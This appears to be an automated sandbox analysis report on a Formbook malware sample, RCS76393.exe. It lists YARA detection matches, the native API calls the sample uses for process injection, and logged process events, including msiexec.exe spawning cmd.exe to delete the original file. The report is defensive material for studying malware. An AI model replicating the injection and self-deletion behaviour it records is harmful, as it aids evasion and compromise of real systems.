          Source: Yara matchFile source: 3.2.RCS76393.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.1.RCS76393.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.2.RCS76393.exe.400000.0.raw.unpack, type: UNPACKEDPE

          System Summary:

          barindex
          Malicious sample detected (through community Yara rule)Show sources
          Source: 00000003.00000001.324919242.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000001.324919242.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.587150105.0000000000480000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.587150105.0000000000480000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000003.00000002.362951284.0000000000D00000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000002.362951284.0000000000D00000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000003.00000002.362449000.0000000000990000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000002.362449000.0000000000990000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000002.326066867.0000000003F40000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.326066867.0000000003F40000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.587988322.00000000030A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.587988322.00000000030A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000003.00000002.362232664.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000002.362232664.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.590270038.0000000004890000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.590270038.0000000004890000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 3.1.RCS76393.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 3.1.RCS76393.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 3.2.RCS76393.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 3.2.RCS76393.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 3.1.RCS76393.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 3.1.RCS76393.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 3.2.RCS76393.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 3.2.RCS76393.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_004181C0 NtCreateFile,
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00418270 NtReadFile,
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_004182F0 NtClose,
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_004183A0 NtAllocateVirtualMemory,
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_0041826B NtReadFile,
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_0041839A NtAllocateVirtualMemory,
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00A398F0 NtReadVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00A39860 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00A39840 NtDelayExecution,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00A399A0 NtCreateSection,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00A39910 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00A39A20 NtResumeThread,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00A39A00 NtProtectVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00A39A50 NtCreateFile,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00A395D0 NtClose,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00A39540 NtReadFile,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00A396E0 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00A39660 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00A397A0 NtUnmapViewOfSection,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00A39780 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00A39FE0 NtCreateMutant,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00A39710 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00A398A0 NtWriteVirtualMemory,
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00A39820 NtEnumerateKey,
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00A3B040 NtSuspendThread,
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00A399D0 NtCreateProcessEx,
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00A39950 NtQueueApcThread,
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00A39A80 NtOpenDirectoryObject,
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00A39A10 NtQuerySection,
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00A3A3B0 NtGetContextThread,
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00A39B00 NtSetValueKey,
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00A395F0 NtQueryInformationFile,
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00A39520 NtWaitForSingleObject,
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00A3AD30 NtSetContextThread,
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00A39560 NtWriteFile,
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00A396D0 NtCreateKey,
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00A39610 NtEnumerateValueKey,
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00A39670 NtQueryInformationProcess,
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00A39650 NtQueryValueKey,
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00A39730 NtQueryVirtualMemory,
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00A3A710 NtOpenProcessToken,
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00A39760 NtOpenProcess,
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00A39770 NtSetInformationFile,
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00A3A770 NtOpenThread,
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_1_004181C0 NtCreateFile,
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_1_00418270 NtReadFile,
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_1_004182F0 NtClose,
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_1_004183A0 NtAllocateVirtualMemory,
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_1_0041826B NtReadFile,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_045C9540 NtReadFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_045C95D0 NtClose,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_045C9650 NtQueryValueKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_045C9660 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_045C96D0 NtCreateKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_045C96E0 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_045C9710 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_045C9FE0 NtCreateMutant,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_045C9780 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_045C9840 NtDelayExecution,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_045C9860 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_045C9910 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_045C99A0 NtCreateSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_045C9A50 NtCreateFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_045C9560 NtWriteFile,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_045CAD30 NtSetContextThread,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_045C9520 NtWaitForSingleObject,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_045C95F0 NtQueryInformationFile,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_045C9670 NtQueryInformationProcess,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_045C9610 NtEnumerateValueKey,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_045CA770 NtOpenThread,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_045C9770 NtSetInformationFile,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_045C9760 NtOpenProcess,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_045CA710 NtOpenProcessToken,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_045C9730 NtQueryVirtualMemory,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_045C97A0 NtUnmapViewOfSection,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_045CB040 NtSuspendThread,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_045C9820 NtEnumerateKey,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_045C98F0 NtReadVirtualMemory,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_045C98A0 NtWriteVirtualMemory,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_045C9950 NtQueueApcThread,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_045C99D0 NtCreateProcessEx,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_045C9A10 NtQuerySection,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_045C9A00 NtProtectVirtualMemory,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_045C9A20 NtResumeThread,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_045C9A80 NtOpenDirectoryObject,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_045C9B00 NtSetValueKey,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_045CA3B0 NtGetContextThread,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_030B83A0 NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_030B8270 NtReadFile,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_030B82F0 NtClose,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_030B81C0 NtCreateFile,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_030B839A NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_030B826B NtReadFile,
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_0041B829
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00401030
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00408C5B
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00408C60
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00402D8B
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00402D90
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_0041C739
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00402FB0
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00A220A0
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00AC20A8
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00A0B090
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00AC28EC
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00AB1002
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00A14120
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_009FF900
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00AC22AE
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00A2EBB0
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00ABDBD2
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00AC2B28
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00A0841F
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00ABD466
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00A22581
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00A0D5E0
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00AC25DD
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00AC2D07
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_009F0D20
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00AC1D55
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00AC2EF7
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00A16E30
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00AC1FF1
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_1_0041B829
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_1_00401030
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0464D466
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0459841F
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04651D55
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04652D07
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04580D20
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046525DD
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0459D5E0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_045B2581
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_045A6E30
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0464D616
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04652EF7
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04651FF1
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04641002
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046528EC
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0459B090
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046520A8
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_045B20A0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0458F900
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_045A4120
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046522AE
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04652B28
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0464DBD2
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_045BEBB0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_030BB829
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_030BC739
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_030A2FB0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_030A2D8B
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_030A2D90
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_030A8C5B
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_030A8C60
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: String function: 009FB150 appears 35 times
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: String function: 0458B150 appears 35 times
          Source: RCS76393.exe, 00000003.00000002.363023409.0000000000D8F000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamemsiexec.exeX vs RCS76393.exe
          Source: RCS76393.exe, 00000003.00000002.362641926.0000000000AEF000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs RCS76393.exe
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dll
          Source: RCS76393.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
          Source: 00000003.00000001.324919242.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000001.324919242.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000002.587150105.0000000000480000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.587150105.0000000000480000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000003.00000002.362951284.0000000000D00000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000002.362951284.0000000000D00000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000003.00000002.362449000.0000000000990000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000002.362449000.0000000000990000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000002.326066867.0000000003F40000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000002.326066867.0000000003F40000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000002.587988322.00000000030A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.587988322.00000000030A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000003.00000002.362232664.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000002.362232664.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000002.590270038.0000000004890000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.590270038.0000000004890000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 3.1.RCS76393.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 3.1.RCS76393.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 3.2.RCS76393.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 3.2.RCS76393.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 3.1.RCS76393.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 3.1.RCS76393.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 3.2.RCS76393.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 3.2.RCS76393.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: RCS76393.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: classification engineClassification label: mal100.troj.evad.winEXE@7/0@12/8
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6864:120:WilError_01
          Source: RCS76393.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\RCS76393.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: unknownProcess created: C:\Users\user\Desktop\RCS76393.exe 'C:\Users\user\Desktop\RCS76393.exe'
          Source: C:\Users\user\Desktop\RCS76393.exeProcess created: C:\Users\user\Desktop\RCS76393.exe 'C:\Users\user\Desktop\RCS76393.exe'
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\SysWOW64\msiexec.exe
          Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\RCS76393.exe'
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\RCS76393.exeProcess created: C:\Users\user\Desktop\RCS76393.exe 'C:\Users\user\Desktop\RCS76393.exe'
